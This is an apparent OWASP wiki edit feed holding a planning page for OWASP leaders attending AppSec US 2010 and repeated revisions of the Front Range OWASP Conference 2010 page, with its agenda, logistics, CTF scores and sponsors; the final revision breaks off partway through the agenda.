[https://www.owasp.org/index.php/Denver Back to OWASP Denver]</div>Edupreyhttps://wiki.owasp.org/index.php?title=AppSec_US_2010,_CA/Attending_Owasp_Leaders&diff=88595AppSec US 2010, CA/Attending Owasp Leaders2010-09-02T20:17:58Z<p>Eduprey: added self, minor cleanup</p>
<hr />
<div>Page to manage the participation of the OWASP leaders at the [[AppSec_US_2010,_CA|AppSec USA in Irvine USA]]<br />
<br />
===Attending Leaders - Confirmed===<br />
<br />
* [[User:Dancornell|Dan Cornell]]- ''San Antonio Chapter and Global Membership Committee''<br />
* Tony UV - ''Atlanta Chapter''<br />
* [[User:Jmanico|Jim Manico]] - ''Podcast Project''<br />
* [[User:MichaelCoates|Michael Coates]] - ''AppSensor project and Global Membership Committee''<br />
* [[User:Knoblochmartin|Martin Knobloch]] - ''Education and Connections Committee''<br />
* [[User:Rsnake|Robert Hansen]] - ''Connections Committee''<br />
* [[User:Mtesauro|Matt Tesauro]] - ''Live CD project, Board Member''<br />
* [[User:Wichers|Dave Wichers]] - ''Top 10 project, Board Member''<br />
* [[User:brennan|Tom Brennan]] - ''NYC Chapter Leader, RFP Criteria project, OWASP-CRM, Board Member''<br />
* [[User:Jeff_Williams|Jeff Williams]] - ''ESAPI project, Board Member''<br />
* [[User:Dinis.cruz|Dinis Cruz]] - ''O2 Platform project, Board Member''<br />
* [[User:Dc|David Campbell]] - ''Denver Chapter, Industry Committee''<br />
* [[User:Eduprey|Eric Duprey]] - ''Denver Chapter''<br />
* [[User:Justin42|Justin Clarke]] - ''London Chapter and Connections Committee''<br />
* Roman Hustad - ''Sacramento Chapter''<br />
* Peter Dean - ''NYC Chapter Leader''<br />
* Georg Hess - ''German Chapter, Industry Committee''<br />
* John Steven - ''NoVA Chapter Lead''<br />
<br />
'''Part of the conference organization'''<br />
* Cassio Goldschmidt - ''Los Angeles Chapter''<br />
* [[:User:Tin Zaw|Tin Zaw]] - ''Los Angeles Chapter''<br />
* Howard Fore - ''Atlanta Chapter (Bring a Developer Attendee)''<br />
* Jon Bango - ''Atlanta Chapter (Bring a Developer Attendee)''<br />
* [[User:Richard greenberg|Richard Greenberg]] - ''Los Angeles Chapter''<br />
* [http://twitter.com/nilematotle Neil Matatall] - ''[[http://www.owasp.org/index.php/Orange_County Orange County Chapter]]''<br />
<br />
===Also attending (part of OWASP community)===<br />
* Joseph Dawson<br />
<br />
===Attending Leaders - TBC===<br />
* [[User:Lorna Alamri|Lorna Alamri]] - ''Connections Committee''<br />
<br />
===Key WebAppSec players===<br />
objective: identfy potential synergies between WebAppSec industry players and OWASP leaders (for example too meet and have a meeting)<br />
<br />
* Firefox Browser <br />
** There are a number of Firefox employees participating and they have shown interest in talking to OWAPS about how we can work together<br />
<br />
===Developers and QA participating===<br />
'''Sponsored by the Atlanta Chapter'''<br />
Howard Fore (Atlanta Developer) - Howard Fore is a senior web developer in Atlanta, Georgia. He's involved in some high-visibility web projects at the Federal Reserve Bank of Atlanta. Increasing awareness of secure software development practices is an departmental objective for 2010 and he's a member of the security workgroup, which is leading the way in that endeavor. Other practices the security workgroup are implementing include static code analysis and code inspection.<br />
<br />
Jon Bango (Atlanta Developer) - Jon Bango is an Information Technology professional with over 13 years experience in the education, financial services and retail industries. Primarily working at the enterprise level, Jon has utilized the J2EE stack in building web applications for the largest home improvement retailer in the world. Most recently he has branched out into RIA technologies working in Adobe Flex and Microsoft Silverlight. Currently, Jon has transitioned into the dark arts at his company’s Information Assurance department in which the groundwork has been laid to utilize his developer talents to create a company wide secure coding initiative.<br />
<br />
<br />
''Question:Should we also do the same tracking for other Developers and QA/Testing professionals?''<br />
<br />
===To do (tasks)===<br />
* for each each participant<br />
** link to MediaWiki user page<br />
** add twitter accounts<br />
*Travel arrangements<br />
** map travel dates<br />
** when/where they are arriving <br />
** where are they staying<br />
* figure out what to do with the leaders when they are there<br />
* should we create a welcome pack for these leaders?<br />
* should we see if they need help in their travel arrangements?<br />
* should we see if its possible to find a local host for the accomodation (it is always better than going into an hotel)?<br />
* do we need a budget? if so, how much?<br />
<br />
[[Category:Connections Committee]]</div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&diff=84419Front Range OWASP Conference 20102010-06-03T21:59:44Z<p>Eduprey: </p>
<hr />
<div>__NOTOC__ <br />
<br />
<!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --><br />
FROC2010 was a major success! If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]<br />
<br />
<br />
<br> <!-- Header --><br />
====Welcome==== <br />
[[Image:Froc2010_sm.png|200px]]<br />
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''<br />
<br />
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! <br />
<br />
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.<br />
<br />
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010. This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.<br />
<br />
====Registration====<br />
<br />
<!-- [http://froc2010.eventbrite.com Registration is now open!] --><br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009. This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis. Pay whatever you or your company can afford.<br />
<br />
<!-- Click [http://froc2010.eventbrite.com HERE] to register now. --><br />
<br />
====Agenda====<br />
<br />
==Agenda and Presentations: 2 June 2010==<br />
<br />
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="4" align="center" style="background:#4058A0; color:white" | June 2, 2010<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Welcome to FROC 2010 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[FROC2010_Abstract_Chess|"Watching Software Run: Software Security Beyond Defect Elimination"]]<br />
''Brian Chess, Fortify Software''<br />
<br />
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&sort=name&layout=list&num=50 Presentation] [http://blip.tv/file/3710067 Video]<br />
<br />
<!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --><br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:35-10:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | OWASP: State of the Union<br />
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''<br />
<br />
[http://blip.tv/file/3710155 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:20 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Cloud Security Alliance: State of the Union<br />
''Randy Barr, Cloud Security Alliance''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:20-10:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:22%; background:#BC857A" | '''AppSec/Technical Track: Room 1'''<br />
| style="width:22%; background:#BCA57A" | '''Cloud/Mobile/Emerging Track: Room 2'''<br />
| style="width:22%; background:#C6E2FF" | '''Management / Exec Track: Room 3'''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]"<br />
''Jeremiah Grossman''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_McClellan|"Building a Secure, Compliant Cloud for the Enterprise"]]<br />
''Matt Ferrari, Hosting.com''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Byrne|"Anatomy of a Logic Flaw"]]<br />
''David Byrne and Charles Henderson, Trustwave''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]"<br />
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Nickerson|"YOU are the weakest link"]]<br />
''Chris Nickerson, Lares Consulting''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Whaley|"Effectively marketing security as a win for both the business and the customer"]]<br />
''Ben Whaley, Applied Trust Engineering and Jeff Smith, Rally Software''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Wheeler|Vulnerabilities in Secure Code: Now and Beyond]]"<br />
''Alex Wheeler and Ryan Smith, Accuvant''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Roberts|"Real life CSI – Data Mining and Intelligence Gathering for the masses"]]<br />
''Chris Roberts, Cyopsis''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Dickson|"The Permanent Campaign: Driving a Secure Software Initiative in the Enterprise"]]<br />
''John Dickson, Denim Group''<br />
<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:40 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Byrne2|Beware of Serialized GUI Objects Bearing Data]]"<br />
''David Byrne and Rohini Sulatycki, Trustwave''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Zusman2|"What's Old Is New Again: An Overview of Mobile Application Security"]]<br />
''Zach Lanier and Mike Zusman, Intrepidus Group''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Goldschmidt|"Fundamental Practices and Tools to implement a security development lifecycle"]]<br />
''Cassio Goldschmidt, Symantec''<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 14:40-15:00 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | BREAK<br />
|-<br />
<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Schmidt|Solving Real-World Problems with an Enterprise Security API]]"<br />
''Chris Schmidt''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNjM5NzZmODQtZTQ1OS00NTYxLWJmOWQtNzE3OWY4OWZkOGMw&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Tucker|"Cloudy with a chance of hack"]]<br />
''Lars Ewe, Cenzic''<br />
<br />
[https://docs.google.com/present/edit?id=0Af-vbfka88vFZGRrcjYycXZfMjUyZDQ3enN6ZmI&hl=en Presentation]<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Cornell|"Application Security Program Management with Vulnerability Manager"]]<br />
''Bryan Beverly, Denim Group''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFNTY3OGUwMGItMmQyMi00YWRmLWJkMzgtMTZhNDNlZjJiNWJm&hl=en Presentation]<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Panel Discussion: Topic TBD. Moderator: John Dickson, Denim Group<br />
|-<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Wrap up, vendor raffles, CTF awards, FREE BEER!<br />
|-<br />
<br />
|}<br />
<br />
<br />
====Logistics====<br />
[[Image:Denver_mountains.JPG]]<br />
<br />
This year, the conference will again be held at University of Colorado, Denver. However, instead of the Tivoli Student Union, this year the event will be hosted at the North Classroom building (Atrium UCD).<br />
<br />
[[File:Froc map.GIF|thumb|left]]<br />
<br />
[http://maps.google.com/maps?f=q&source=s_q&hl=en&geocode=&q=1200+Larimer+Street,+Denver,+CO&sll=37.0625,-95.677068&sspn=37.188995,62.226563&ie=UTF8&hq=&hnear=1200+Larimer+St,+Denver,+Colorado+80204&z=16&iwloc=A Google Map of the Venue: 1200 Larimer St., Denver CO 80204]<br />
<br />
=====Accomodation=====<br />
OWASP has negotiated discounted rates with the uber-pimpin [http://www.hotelteatro.com/ Hotel Teatro]. Rooms under the FROC rate are $159/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention FROC or use the [https://reservations.ihotelier.com/crs/g_reservation.cfm?groupID=464765&hotelID=14708 iHotelier.com link here].<br />
<br />
=====How to get to the venue?=====<br />
<br />
*By taxi: taxi from the airport to venue is about $50 USD<br />
<br />
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free<br />
<br />
*By car: there is plenty of parking at the UCD. Attendees should park at the Tivoli lot (as in past years) and it is a short walk to the North Classroom buildings. Parking validation will be provided for registered FROC participants.<br />
<br />
<br />
<!-- <br />
====Call for Presentations====<br />
The [[Front_Range_OWASP_Conference_2010_CFP|call for presentations]] closed 31 March 2010. We are no longer accepting proposals for presentations. If you have already submitted a presentation you can, however update your abstract or submit additional information to clarify your proposal. --><br />
<br />
<!-- ===[[SnowFROC Tentative Schedule]]=== --><br />
<br />
<!-- <br />
====Agenda and Presentations: 5 March 2009====<br />
<br />
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="3" align="center" style="background:#4058A0; color:white" | March 5, 2009<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Welcome to SnowFROC AppSec 2009 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:45 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[SnowFROC_Abstract_Grossman|"Top Ten Web Hacking Techniques of 2008: What's possible, not probable"]]<br />
''Jeremiah Grossman, Whitehat Security''<br />
<br />
[http://video.google.com/videoplay?docid=2875886330538461390 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:45-10:15 || colspan="2" style="width:80%; background:#F2F2F2" align="center" | OWASP State of the Union<br />
''Tom Brennan, OWASP Board''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:15-10:30 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:40%; background:#BC857A" align="left" | "[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]"<br />
''Ed Bellis, Orbitz''<br />
<br />
[http://video.google.com/videoplay?docid=-8396241750899139680 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Zusman|"Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations"]]<br />
''Mike Zusman, Intrepidus Group''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Paller|"A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors"]]<br />
''Alan Paller, SANS''<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Stads|"Adobe Flex, AMF 3 and BlazeDS: An Assessment"]] <br />
''Kevin Stadmeyer, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=1629208419122953007 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 12:00-13:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:40%; background:#BC857A" | Management / Executive Track: Room 1<br />
| style="width:40%; background:#BCA57A" | Deep Technical Track: Room 2<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:00-13:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Peloquin|"Building an Effective Application Security Program"]]<br />
''Joey Peloquin, Fishnet Security''<br />
<br />
[http://video.google.com/videoplay?docid=-2540122072368010669 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Belani|"Bad Cocktail: Spear Phishing + Application Hacks"]]<br />
''Rohyt Belani, Intrepidus Group''<br />
<br />
[http://video.google.com/videoplay?docid=3127205451740977427 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 13:50-14:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Byrne|"Automated vs. Manual Security: You can't filter The Stupid"]]<br />
''David Byrne & Charles Henderson, Trustwave''<br />
<br />
[http://video.google.com/videoplay?docid=7611144342490803641 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Abstract_Damele|"SQL injection: Not only AND 1=1"]]<br />
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''<br />
<br />
[http://video.google.com/videoplay?docid=129190988572738701 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 14:50-15:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:00-15:50 || style="width:40%; background:#BC857A" align="left" | [[SnowFROC_Abstract_Neucom|"Security Policy Management: Best Practices for Web Services and Application Security"]]<br />
''Ray Neucom, IBM''<br />
<br />
[http://video.google.com/videoplay?docid=-4972597638535731442 Video]<br />
| style="width:40%; background:#BCA57A" align="left" | [[SnowFROC_Cornell_Dickson_Abstract|"Vulnerability Management in an Application Security World"]]<br />
''Dan Cornell & John Dickson, Denim Group''<br />
<br />
[http://video.google.com/videoplay?docid=8588268474844052248 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 15:50-16:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Panel: Emerging Threats and Enterprise Countermeasures<br />
Moderator: John Dickson<br/><br />
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 16:30-17:30 || colspan="2" style="width:40%; background:#F2F2F2" align="left" | Conference Wrap Up, CTF Awards & Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] <br />
|-<br />
| style="width:10%; background:#7B8ABD" | 17:30-21:00 || colspan="2" style="width:80%; background:#C2C2C2" align="left" | OWASP Social Gathering: Dinner and Drinks @ TBD<br />
|}<br />
<br />
--><br />
<br />
<!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --><br />
<br />
====Capture the Flag (CTF)====<br />
<br />
A capture the flag contest was held, with challenges in the categories of network, forensics, and web applications. The winner received a new iPad. Second and third place received an iPod shuffle.<br />
<br />
The team that won the contest consisted of four members of the Denver Defcon group, dc303 (http://dc303.org). This group also plays in the annual Defcon CTF competition (with about 20 other folks from the Denver area). If you are interested in joining them for future CTF competitions (local and abroad), contact mantis1 at gmail.com.<br />
<br />
Second place went to Matthew Rowley (playing on his own)<br />
<br />
Final scores:<br />
{| border="3"<br />
|Rank||Name||Score||Comments<br />
|-<br />
|'''1'''||'''mantis'''||'''4500'''||<br />
|-<br />
|'''2'''||'''Matthew Rowley'''||'''2850'''||'''(wuntee)'''<br />
|-<br />
|'''3'''||'''jgimer'''||'''2300'''||<br />
|-<br />
|4||jsouza||2200||<br />
|-<br />
|5||CSURams||1800||<br />
|-<br />
|6||quincymagoo||1200||<br />
|-<br />
|7||skehoe||700||<br />
|-<br />
|8||jtevans||700||<br />
|-<br />
|9||igctf||700||<br />
|-<br />
|10||kdavis||700||<br />
|}<br />
<br />
<br />
====Conference Committee====<br />
<br />
FROC 2010 Planning Committee Chair: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
Presentation Selection Committee:<br />
* Mark Bristow - OWASP Global Conference Committee<br />
* David Campbell - OWASP Denver<br />
* Eric Duprey - OWASP Denver<br />
* Chris Hoff - Cloud Security Alliance<br />
* Eoin Keary - Chair, OWASP Global Conference Committee<br />
* Michael Sutton - Cloud Security Alliance<br />
* Jim Reavis - Cloud Security Alliance<br />
<br />
<br />
Colorado Chapter Hosts:<br />
* David Campbell - OWASP Denver - dcampbell at owasp dot org<br />
* Eric Duprey - OWASP Denver - eduprey at owasp dot org<br />
<br />
<br />
Vendor Exhibition POC: Kathy Thaxton - kthaxton at owasp dot org<br />
<br />
<br />
Capture the Flag POC: Eric Duprey - eduprey at owasp dot org<br />
<br />
<br />
====Conference Sponsors====<br />
<br />
[[File:Sponsors.PNG]]<br />
<br />
The following organizations are proud sponsors of this conference:<br />
<!-- <br />
*Accuvant<br />
*Breach<br />
*Business Partner Solutions<br />
*Denim Group<br />
*Fishnet Security<br />
*IBM<br />
*Imperva<br />
*Laz<br />
*Lares<br />
*Trustwave<br />
*WhiteHat Security --><br />
<br />
*[http://www.accuvant.com/ Accuvant]<br />
*[http://www.denimgroup.com/ Denim Group]<br />
*[http://www.fortify.com/ Fortify Software]<br />
*[http://www.hosting.com/ Hosting.com]<br />
*[http://www.whitehatsec.com/home/index.html Whitehat Security]<br />
<br />
<br />
If you are interested in sponsoring next year's Front Range OWASP Conference, please contact Kathy Thaxton at kthaxton at owasp dot org.<br />
<br />
Logistics information for sponsors is available [[FROC2010 Sponsor Info|here]]<br />
<br />
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].<br />
<br />
[[Category:OWASP AppSec Conference]]<br />
<br />
<br />
====Twitter Feed====<br />
{|<br />
|-<br />
| style="border: 1px solid rgb(204, 204, 204); width: 100%; font-size: 95%; color: rgb(0, 0, 0); background-color: rgb(236, 236, 236);" | <br />
Use the '''[http://search.twitter.com/search?q=%23FROC #FROC]''' hashtag for your tweets (What are [http://hashtags.org/ hashtags]?) <br />
<br />
'''@OWASP303 Twitter Feed ([http://twitter.com/OWASP303 follow us on Twitter!])'''<br />
<twitter>55021150</twitter> <br />
<br />
| style="width: 110px; font-size: 95%; color: rgb(0, 0, 0);" | <br />
|} <br />
<br />
<br />
<!-- <hr><br />
<paypal>Denver</paypal> --><br />
<br />
<headertabs /></div>Edupreyhttps://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2010&diff=84418Front Range OWASP Conference 20102010-06-03T21:59:10Z<p>Eduprey: </p>
<hr />
<div>__NOTOC__ <br />
<br />
<!-- [http://froc2010.eventbrite.com/ Registration is NOW OPEN] --><br />
FROC2010 was a major success! If you attended the event, please complete the [http://www.surveymonkey.com/s/FROC2010 Speaker Evaluation Survey]<br />
<br />
<br />
<br> <!-- Header --><br />
====Welcome==== <br />
[[Image:Froc2010_sm.png|200px]]<br />
'''Welcome to FROC 2010, the third annual Front Range OWASP Application Security Conference!'''<br />
<br />
After successful FROC's in June of 2008, and [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 March of 2009], we are back in Denver, Colorado USA on Wednesday the 2nd of June 2010! <br />
<br />
This year we again present a full day, multi-track event, which will provide valuable information for managers and executives as well as developers and engineers.<br />
<br />
In 2009, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2010. This year we are organizing the conference with the support of our colleagues at the [http://www.cloudsecurityalliance.org/ Cloud Security Alliance], and will feature an AppSec track as well as a CloudSec/VirtSec track.<br />
<br />
====Registration====<br />
<br />
<!-- [http://froc2010.eventbrite.com Registration is now open!] --><br />
<br />
Due to the hard work of our organizers and the gracious support of our sponsors, FROC was a free event in 2008 and 2009. This year, thanks to the generosity of our [http://www.owasp.org/index.php/Front_Range_OWASP_Conference_2010#tab=Conference_Sponsors sponsors] we are offering tickets to the event on a DONATION basis. Pay whatever you or your company can afford.<br />
<br />
<!-- Click [http://froc2010.eventbrite.com HERE] to register now. --><br />
<br />
====Agenda====<br />
<br />
==Agenda and Presentations: 2 June 2010==<br />
<br />
The agenda follows the successful OWASP conference multi track format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.<br />
<br />
{| style="width:80%" border="0" align="center"<br />
! colspan="4" align="center" style="background:#4058A0; color:white" | June 2, 2010<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 07:30-08:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Registration and Continental Breakfast in the Sponsor Expo Room<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:30-08:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Welcome to FROC 2010 Conference <br />
''David Campbell, OWASP Denver''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 08:35-09:35 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Keynote: [[FROC2010_Abstract_Chess|"Watching Software Run: Software Security Beyond Defect Elimination"]]<br />
''Brian Chess, Fortify Software''<br />
<br />
[https://docs.google.com/a/owasp.org/leaf?id=0B_-vbfka88vFNjMxYTcwY2ItNjgxNy00ZjMzLTkwMTUtN2IyMzA4MmE3OWVl&sort=name&layout=list&num=50 Presentation] [http://blip.tv/file/3710067 Video]<br />
<br />
<!-- [http://video.google.com/videoplay?docid=2875886330538461390 Video] --><br />
|-<br />
| style="width:10%; background:#7B8ABD" | 09:35-10:00 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | OWASP: State of the Union<br />
''Tom Brennan, OWASP Board - [http://www.owasp.org/index.php/User:Brennan BIO]''<br />
<br />
[http://blip.tv/file/3710155 Video]<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:00-10:20 || colspan="3" style="width:80%; background:#F2F2F2" align="center" | Cloud Security Alliance: State of the Union<br />
''Randy Barr, Cloud Security Alliance''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:20-10:30 || colspan="3" style="width:80%; background:#C2C2C2" align="left" | Break - Expo - CTF<br />
|-<br />
| style="width:10%; background:#7B8ABD" | || style="width:22%; background:#BC857A" | '''AppSec/Technical Track: Room 1'''<br />
| style="width:22%; background:#BCA57A" | '''Cloud/Mobile/Emerging Track: Room 2'''<br />
| style="width:22%; background:#C6E2FF" | '''Management / Exec Track: Room 3'''<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 10:30-11:15 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Grossman|2010: Web Hacking Odyssey - The Top Hacks of the Year]]"<br />
''Jeremiah Grossman''<br />
<br />
[https://docs.google.com/fileview?id=0B_-vbfka88vFZTIwOWY3NjctZTY1OC00YTRjLThjNGUtMDIwZTk3MmVhN2Zi&hl=en Presentation] Video<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_McClellan|"Building a Secure, Compliant Cloud for the Enterprise"]]<br />
''Matt Ferrari, Hosting.com''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Byrne|"Anatomy of a Logic Flaw"]]<br />
''David Byrne and Charles Henderson, Trustwave''<br />
<br />
|-<br />
| style="width:10%; background:#7B8ABD" | 11:15-12:00 || style="width:22%; background:#BC857A" align="left" | "[[FROC2010_Abstract_Zusman|Advanced MITM Techniques for Security Testers]]"<br />
''Mike Zusman, Raj Umadas and Aaron Rhodes, Intrepidus Group''<br />
<br />
<!-- [http://video.google.com/videoplay?docid=-8396241750899139680 Video] --><br />
| style="width:22%; background:#BCA57A" align="left" | [[FROC2010_Abstract_Nickerson|"YOU are the weakest link"]]<br />
''Chris Nickerson, Lares Consulting''<br />
<br />
| style="width:22%; background:#C6E2FF" align="left" | [[FROC2010_Abstract_Whaley|"Effectively marketing security as a win for both the business and the customer"]]<br />
